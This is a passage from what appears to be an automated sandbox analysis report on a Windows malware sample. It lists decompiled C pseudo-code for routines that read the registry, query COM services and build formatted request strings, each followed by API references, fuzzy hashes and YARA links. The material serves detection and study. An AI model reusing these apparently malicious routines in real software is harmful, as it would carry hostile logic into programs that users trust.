				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04616837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x04614d15
                                0x04614d19
                                0x04614d1a
                                0x04614d1b
                                0x04614d1d
                                0x04614d1f
                                0x04614d24
                                0x04614d27
                                0x04614dbe
                                0x04614dc5
                                0x04614dc5
                                0x04614d30
                                0x04614d37
                                0x04614d47
                                0x04614d47
                                0x04614d4d
                                0x04614d4f
                                0x04614d54
                                0x04614d5d
                                0x04614d65
                                0x04614d68
                                0x04614d73
                                0x04614d77
                                0x04614d79
                                0x04614d7a
                                0x04614d83
                                0x04614d87
                                0x04614d98
                                0x04614d89
                                0x04614d8e
                                0x04614d93
                                0x04614da2
                                0x04614da2
                                0x04614d77
                                0x04614da8
                                0x04614dae
                                0x04614dae
                                0x04614db7
                                0x04614dbc
                                0x04614dbc
                                0x00000000

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04614D37
                                • lstrlenW.KERNEL32(?), ref: 04614D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04614D8E
                                • SysFreeString.OLEAUT32(?), ref: 04614DA2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 5b4a9f612258eba2e62c13a50008e4b2327029019263293b9fcbb4eb4cfa833e
                                • Instruction ID: ee388d0d3fe272a6e7a7928862fd801a5dd3f71e5703b32e20e4fec581406bec
                                • Opcode Fuzzy Hash: 5b4a9f612258eba2e62c13a50008e4b2327029019263293b9fcbb4eb4cfa833e
                                • Instruction Fuzzy Hash: 83211B75E00219FFCB10DFA4C88499EBBB8EF49355B18816AE905D7220EB31AA45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611AB8, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04611AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04614C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x461a2d4; // 0xdad5a8
				_t4 = _t24 + 0x461bd60; // 0x53c9308
				_t5 = _t24 + 0x461bd08; // 0x4f0053
				_t26 = E04615384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x461a2d4; // 0xdad5a8
						_t11 = _t32 + 0x461bd54; // 0x53c92fc
						_t48 = _t11;
						_t12 = _t32 + 0x461bd08; // 0x4f0053
						_t52 = E04615D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x461a2d4; // 0xdad5a8
							_t13 = _t35 + 0x461bd9e; // 0x30314549
							_t37 = E046174B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x461a2b4 - 6;
								if( *0x461a2b4 <= 6) {
									_t42 =  *0x461a2d4; // 0xdad5a8
									_t15 = _t42 + 0x461bbaa; // 0x52384549
									E046174B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x461a2d4; // 0xdad5a8
							_t17 = _t38 + 0x461bd98; // 0x53c9340
							_t18 = _t38 + 0x461bd70; // 0x680043
							_t45 = E04611F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x461a290, 0, _t52);
						}
					}
					HeapFree( *0x461a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04613C84(_t54);
				}
				return _t45;
			}



















                                0x04611ab8
                                0x04611ac8
                                0x04611acb
                                0x04611ad2
                                0x04611ad4
                                0x04611ad4
                                0x04611ad7
                                0x04611adc
                                0x04611ae3
                                0x04611af0
                                0x04611af5
                                0x04611af9
                                0x04611b07
                                0x04611b15
                                0x04611b19
                                0x04611baa
                                0x04611baa
                                0x04611b1f
                                0x04611b1f
                                0x04611b24
                                0x04611b24
                                0x04611b2b
                                0x04611b37
                                0x04611b39
                                0x04611b3b
                                0x04611b3d
                                0x04611b44
                                0x04611b4f
                                0x04611b56
                                0x04611b58
                                0x04611b5f
                                0x04611b61
                                0x04611b68
                                0x04611b73
                                0x04611b73
                                0x04611b5f
                                0x04611b78
                                0x04611b7d
                                0x04611b84
                                0x04611ba2
                                0x04611ba4
                                0x04611ba4
                                0x04611b3b
                                0x04611bb6
                                0x04611bb6
                                0x04611bb8
                                0x04611bbd
                                0x04611bbf
                                0x04611bbf
                                0x04611bca

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,053C9308,00000000,?,7519F710,00000000,7519F730), ref: 04611B07
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053C9340,?,00000000,30314549,00000014,004F0053,053C92FC), ref: 04611BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,046120B0), ref: 04611BB6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: bce8a1a2dba279180818a02a47d1ccd7af8f395e7aea631b695dc36784fb3258
                                • Instruction ID: a3df593ae81b93899fcce98ab634cb40732dbf8814af406bc3986e353dd01a1f
                                • Opcode Fuzzy Hash: bce8a1a2dba279180818a02a47d1ccd7af8f395e7aea631b695dc36784fb3258
                                • Instruction Fuzzy Hash: D2317C71A10109BFDB11DBE0DD84EDA7BB8EB49B04F1C016BA604A7271F675BE08DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615F9A, Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 91%
                                			E04615F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x461a2d4; // 0xdad5a8
				_t2 = _t22 + 0x461b662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x461a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x461a2a4 =  *0x461a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E0461283A(_t49, _t48); // executed
					_t33 = E0461738C(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x461a2a4 < 5) {
							 *0x461a2a4 =  *0x461a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E04611492();
					HeapFree( *0x461a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x461a390; // 0x53c8d5d
				if(RtlAllocateHeap( *0x461a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E046146D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}















                                0x04615f9a
                                0x04615f9a
                                0x04615fa1
                                0x04615fa8
                                0x04615fac
                                0x04615fb1
                                0x04615fbc
                                0x04615fcc
                                0x0461600f
                                0x04616013
                                0x04616017
                                0x04616018
                                0x0461601b
                                0x04616020
                                0x04616020
                                0x04616023
                                0x04616027
                                0x04616061
                                0x04616061
                                0x04616067
                                0x0461606e
                                0x0461606e
                                0x04616029
                                0x0461602c
                                0x0461602e
                                0x0461603b
                                0x0461603d
                                0x04616044
                                0x0461607b
                                0x04616080
                                0x04616082
                                0x04616084
                                0x04616084
                                0x00000000
                                0x04616082
                                0x04616046
                                0x0461604d
                                0x0461605b
                                0x00000000
                                0x0461605b
                                0x04615fce
                                0x04615fe9
                                0x04616003
                                0x00000000
                                0x04616003
                                0x04615ffc
                                0x00000000

                                APIs
                                • wsprintfA.USER32 ref: 04615FBC
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04615FE1
                                  • Part of subcall function 046146D1: GetTickCount.KERNEL32 ref: 046146E8
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614735
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614752
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614772
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 04614790
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 046147B3
                                  • Part of subcall function 046146D1: wsprintfA.USER32 ref: 046147D4
                                • HeapFree.KERNEL32(00000000,046120FA,?,?,046120FA,?), ref: 0461605B
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: wsprintf$Heap$AllocateCountFreeTick
                                • String ID:
                                • API String ID: 2794511967-0
                                • Opcode ID: 0f9f8682f0ccb1b32ba72e26bbe867fe3343fc3deb8f9c4091dfd595a687675b
                                • Instruction ID: 267c92a02a23d4bb633d2969e8673253dea14624c9d95c652715075d9019913f
                                • Opcode Fuzzy Hash: 0f9f8682f0ccb1b32ba72e26bbe867fe3343fc3deb8f9c4091dfd595a687675b
                                • Instruction Fuzzy Hash: E6314C75601209EFCB01DFA4DA44ADA3BB9FF08355F184026F905D7261FB39E954CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612F68, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E04612F68(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x461a290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E046177A4(_t57 - _a4, _a4, _t48);
							_t38 = E046177A4(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E046177A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                0x04612f70
                                0x04612f75
                                0x04612f77
                                0x04612f7e
                                0x04612f90
                                0x04612f90
                                0x04612f94
                                0x04612f96
                                0x04612f99
                                0x04612f9c
                                0x04612fa5
                                0x04612faf
                                0x04612fb3
                                0x04612fb8
                                0x04612fc8
                                0x04612fce
                                0x04612fd2
                                0x04613021
                                0x04612fd4
                                0x04612fd4
                                0x04612fdd
                                0x04612fec
                                0x04612ff1
                                0x04612ffe
                                0x04613007
                                0x04613012
                                0x04613019
                                0x0461301d
                                0x0461301d
                                0x04612fd2
                                0x04613028
                                0x0461302f

                                APIs
                                • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04612F9C
                                • StrStrA.SHLWAPI(00000000,?), ref: 04612FA9
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04612FC8
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 556738718-0
                                • Opcode ID: 01d3fa1c8940302183aa39b409018e08cf3ce30af98bbda06d3a5c59209fa7c9
                                • Instruction ID: 0f691f7d6eb02ff2263ffbea0b4b5e6684a83d12c14239fbe623d97f3639d7e9
                                • Opcode Fuzzy Hash: 01d3fa1c8940302183aa39b409018e08cf3ce30af98bbda06d3a5c59209fa7c9
                                • Instruction Fuzzy Hash: A8217C39600149AFDF01CF68C984B9EBFB5EF85315F088155EC04AB324D735E955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046171A5, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E046171A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x461a2d4; // 0xdad5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x461ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E04613875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x461a2d4; // 0xdad5a8
					_t5 = _t19 + 0x461ba8c; // 0x6e0049
					_t34 = E04613875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E046150CA(_t34);
					}
					E046150CA(_t31);
				}
				return _v8;
			}













                                0x046171ab
                                0x046171b0
                                0x046171b5
                                0x046171bc
                                0x046171c8
                                0x046171cc
                                0x046171ce
                                0x046171d4
                                0x046171e0
                                0x046171e4
                                0x046171f7
                                0x046171ff
                                0x04617213
                                0x0461721b
                                0x0461721d
                                0x0461721d
                                0x04617224
                                0x04617224
                                0x0461722b
                                0x0461722b
                                0x04617231
                                0x04617236
                                0x0461723c

                                APIs
                                  • Part of subcall function 04613875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,046171C8,004F0053,00000000,?), ref: 0461387E
                                  • Part of subcall function 04613875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,046171C8,004F0053,00000000,?), ref: 046138A8
                                  • Part of subcall function 04613875: memset.NTDLL ref: 046138BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 046171F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 04617213
                                • RegCloseKey.ADVAPI32(00000000), ref: 04617224
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                • Opcode ID: 7e99f40a4ca58c458b007dbd4b0f8beea289478738b9dd77c1f3cdaabd8afa94
                                • Instruction ID: c8095c6c33cfe75195df77d449dc96a0813676ac01fc9b1b191535ee63190c7f
                                • Opcode Fuzzy Hash: 7e99f40a4ca58c458b007dbd4b0f8beea289478738b9dd77c1f3cdaabd8afa94
                                • Instruction Fuzzy Hash: BF111272600209FBEB11DBD4DC84FAE77BCEB44705F18005AB501E7161F774EA059B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461181D, Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0461181D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04616837(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x461a324, 0x110);
					_t27 =  *0x461a328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04615F68(0x110, _a4, _t27, 0);
					}
					if(E04612BB0( &_v36) != 0) {
						_t35 = E046139C5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E04612BE3(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E046150CA(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E046150CA(_a4);
				}
				return _v16;
			}
















                                0x04611823
                                0x04611828
                                0x04611835
                                0x04611838
                                0x0461183b
                                0x04611842
                                0x04611845
                                0x04611853
                                0x04611858
                                0x0461185d
                                0x04611862
                                0x04611864
                                0x0461186c
                                0x0461186c
                                0x0461187b
                                0x04611890
                                0x04611897
                                0x0461189e
                                0x046118a4
                                0x046118aa
                                0x046118b2
                                0x046118b8
                                0x046118bb
                                0x046118c8
                                0x046118cd
                                0x046118d1
                                0x046118d1
                                0x04611897
                                0x046118dc
                                0x046118e7
                                0x046118e7
                                0x046118f3

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • memcpy.NTDLL(00000000,00000110,046120FA,046120FA,?,?,046120FA,?,?,04616042,?), ref: 04611853
                                • memset.NTDLL ref: 046118C8
                                • memset.NTDLL ref: 046118DC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 1529149438-0
                                • Opcode ID: 239a10274dba3bf4ea3857e3f4de451108187988fe21498e1bccb0fd6fe47ed0
                                • Instruction ID: 1bb40cbdfcc970f2b2fb392c28f640c3e29f583815b2b9d3c577fc5f04354e0f
                                • Opcode Fuzzy Hash: 239a10274dba3bf4ea3857e3f4de451108187988fe21498e1bccb0fd6fe47ed0
                                • Instruction Fuzzy Hash: 5E213075A00218BBEF11AFA5CC40FEEBBB8AF49244F084059F904E6260F774E6408BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611206, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E04611206(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x461a2d4; // 0xdad5a8
				_t4 = _t49 + 0x461b418; // 0x53c89c0
				_t5 = _t49 + 0x461b408; // 0x9ba05972
				_t51 =  *0x461a140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x461a2d4; // 0xdad5a8
						_t30 = _t56 + 0x461b3f8; // 0x53c89a0
						_t31 = _t56 + 0x461b428; // 0x4c96be40
						_t58 =  *0x461a114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x461a2d4; // 0xdad5a8
											_t23 = _t76 + 0x461b3f8; // 0x53c89a0
											_t24 = _t76 + 0x461b428; // 0x4c96be40
											_t105 =  *0x461a114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x461a2d4; // 0xdad5a8
													_t67 = _v28;
													_t40 = _t99 + 0x461b3e8; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                                0x04611211
                                0x04611213
                                0x0461121a
                                0x0461121b
                                0x0461121c
                                0x0461121d
                                0x04611223
                                0x04611228
                                0x04611232
                                0x04611239
                                0x0461123f
                                0x04611243
                                0x04611249
                                0x04611251
                                0x04611252
                                0x04611257
                                0x04611258
                                0x0461125a
                                0x0461125d
                                0x0461125e
                                0x0461125f
                                0x04611265
                                0x046112fa
                                0x046112ff
                                0x04611306
                                0x04611310
                                0x04611316
                                0x04611318
                                0x0461131e
                                0x00000000
                                0x0461126b
                                0x0461126b
                                0x04611272
                                0x0461127b
                                0x0461127f
                                0x04611285
                                0x04611288
                                0x046112ef
                                0x00000000
                                0x0461128a
                                0x0461128a
                                0x04611321
                                0x04611323
                                0x00000000
                                0x00000000
                                0x04611290
                                0x04611290
                                0x04611290
                                0x04611297
                                0x0461129d
                                0x046112a2
                                0x046112aa
                                0x046112ab
                                0x046112ac
                                0x046112ae
                                0x046112b2
                                0x046112b6
                                0x00000000
                                0x046112b8
                                0x046112bc
                                0x046112c1
                                0x046112c8
                                0x046112d8
                                0x046112da
                                0x046112e0
                                0x046112e5
                                0x04611325
                                0x04611325
                                0x04611332
                                0x04611336
                                0x0461133b
                                0x04611341
                                0x04611346
                                0x04611350
                                0x04611352
                                0x04611358
                                0x04611358
                                0x0461135b
                                0x04611361
                                0x00000000
                                0x00000000
                                0x00000000
                                0x046112e5
                                0x00000000
                                0x046112e7
                                0x046112e7
                                0x046112e8
                                0x00000000
                                0x046112ed
                                0x0461128a
                                0x04611288
                                0x0461127f
                                0x04611364
                                0x04611364
                                0x0461136a
                                0x0461136a
                                0x04611373

                                APIs
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,?,?,?,?,04612932), ref: 046112D2
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,04612932,00000000,00000000,00000000,006D0063), ref: 04611310
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryServiceUnknown_
                                • String ID:
                                • API String ID: 2042360610-0
                                • Opcode ID: cc85ba4424f65698641b0ace7e217568e89ab252049f7986bb19481689a68286
                                • Instruction ID: 6e85ac8cdf79bde37bb7df6e4b67a0a4e20f009399ad5bbbfe7ceaf1dcb6089b
                                • Opcode Fuzzy Hash: cc85ba4424f65698641b0ace7e217568e89ab252049f7986bb19481689a68286
                                • Instruction Fuzzy Hash: 2A510E75900219AFCB00DFE8C884DEEB7B9FF4D710B098559EA15EB221E635AD45CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616872, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E04616872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
